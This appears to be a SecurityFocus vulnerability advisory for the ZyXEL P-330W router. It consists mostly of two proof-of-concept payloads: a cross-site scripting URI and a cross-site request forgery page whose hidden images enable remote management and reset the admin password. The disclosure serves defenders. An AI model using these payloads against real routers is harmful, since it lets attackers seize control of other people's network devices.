ZyXEL P-330W Multiple Vulnerabilities

Attackers can exploit these issues by enticing an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com:<router_port>/ping.asp?pingstr=�><script>alert("M
erry Christams")</script>

The following cross-site request-forgery example was provided:

<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://www.example.com:<router_port>/goform/formRmtMgt?webWanAccess
=ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPassT
hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://www.example.com:<router_port>/goform/formPasswordSetup?usern
ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
height="0">
</body>
</html>


 

Privacy Statement
Copyright 2010, SecurityFocus